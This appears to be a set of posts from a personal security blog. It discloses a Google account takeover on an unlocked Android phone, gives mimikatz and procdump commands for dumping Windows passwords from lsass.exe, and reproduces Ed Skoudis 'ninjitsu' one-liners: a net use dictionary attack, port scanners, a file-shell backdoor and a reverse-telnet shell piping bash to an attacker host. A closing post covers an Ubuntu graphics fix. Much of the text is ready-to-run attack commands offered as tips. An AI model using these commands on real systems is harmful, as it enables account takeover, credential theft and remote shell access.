Steal Google account on stolen or unattended unlocked phone.

Steal Google account on stolen or unattended unlocked phone.

TL;DR: 
Having access to an unlocked phone (weak pin or with pattern attack...smudge attack) an attacker can reset your Google account if this account does not have 2-Step authentication.

This is a security bug in the way the Android devices allow to reset a Google Account password. 

I've reported this to the google security team, but they say that this is not a security bug.

From my perspective this IS a vulnerability, so after talking several times with the triage at security@google.com I've decided to publish this.

I've made a video to show the vulnerability, the video shows the following steps to steal the account:
Video: https://www.youtube.com/watch?v=zstbkS9yrv4

Just for PoC
- clear the Chrome cache, to make sure user is not logged in (just for PoC)
- open YouTube app, to show that the user is not logged in

Attacker Steps:
- attacker opens play store to check the user of the phone
- attacker opens the browser with the URL to accounts.google.com to login with the play store account
- enter the email on the form "One account. All of Google" -> click next
- on the password form -> click "forgot password"
- on the form "Enter the last password..." -> click "try a different question"
- on the next form -> click "Send prompt"
- on the prompt "Trying to sign in" -> click "Yes"
- after this the mobile will show "Sign-in approved"
- then it allows to change the users' password without the need for anything else
- create a new password
- click -> "change password"
- Done.

After this it's possible to navigate on all Google services with this new password.
The attacker at this time has access to all the user information related to the Google accounts.

From my perspective a full Google account take over is a big thing, these days people have everything in Google.

Now, what can be done in this case? How can i protect myself?

One extra step in securing your Google account is having the 2-Step authentication configured. 
And this is what i encourage all people to do.

While talking to some of my colleagues, one reminded me of an option (thanks @clviper) that if a user has his phone stolen he can activate in the Android Device Manager the option to "Erase".
Link to the Android Device Manager:
https://www.google.com/android/devicemanager

This should be configured to "On":

Although this is not the solution to the problem this can protect your data, because when the attacker connects the phone to a network the phone should be erased.

Get passwords from Lsass.exe dump

Benjamin Delpy found that the windows process lsass.exe stores password in memory in a reversible way.
Then he developed a great tool called "mimikatz" - the next lines are some steps to get some cleartext passwords

Use "procdump" a tool from (Russinovich) Microsoft to dump the memory of the lsass.exe process
(download http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx)

> procdump -accepteula -ma lsass.exe lsass.dmp

run mimikatz and use debug mode
> privilege::debug

use minidump mode and load the lsass.dmp 
> sekurlsa::minidump lsass.dmp

Another way is to run mimikatz in runtime, but it is not stealthy (some AV flag it)
Run mimkatz in debug mode
> privilege::debug

get passwords in memory
> sekurlsa::logonPasswords

You can use Mimikatz in Metasploit too
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  '"sekurlsa::logonPasswords full" exit'  

Thanks: (the great Benjamim Delpy)
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html 


Another interesting vector is getting hashes from NTDS.DIT (active directory database)

http://blog.spiderlabs.com/2013/11/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system-.html
http://neobits.org/extracting-ntds-dit-from-a-live-domain-controller-the-easy-way/
http://bernardodamele.blogspot.pt/2011/12/dump-windows-password-hashes_16.html
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/

Pentesting ninjitsu - Ed Skoudis

http://www.jedge.com/wordpress/2008/12/penetration-testing-ninjitsu/

Great article, very nice commands:
---------------------------------------------------------------

Ping Sweep

C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”

Reverse DNS Lookup

C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack

C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner

$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”

$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client

C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer

C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell

C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing

C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista

C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista

C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0

C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings

C:\>net accounts /domain

Linux Ubuntu 12.04 - Ati / AMD discrete graphics

After searching "A LOT" on the web, forums, etc... i found a page that has a tip that works to change linux xserver to discrete graphics.

http://thealarmclocksixam.wordpress.com/2012/03/23/ubuntu-12-04-and-hybrid-graphics-on-sony-vaio-s/

I used this on my laptop HP dv6

Here are the steps;

1. edit /etc/modprobe.d/blacklist.conf

2. add these 2 lines to the end of the file 
# radeon
blacklist radeon

3. edit /etc/rc.local

modprobe radeon
chown -R $USER:$USER /sys/kernel/debug
echo OFF > /sys/kernel/debug/vgaswitcheroo/switch

4. reboot and it should be good

5. you can check if it worked

cat /sys/kernel/debug/vgaswitcheroo/switch

no more fan's noise, no more temperature...

Very nice hack

:D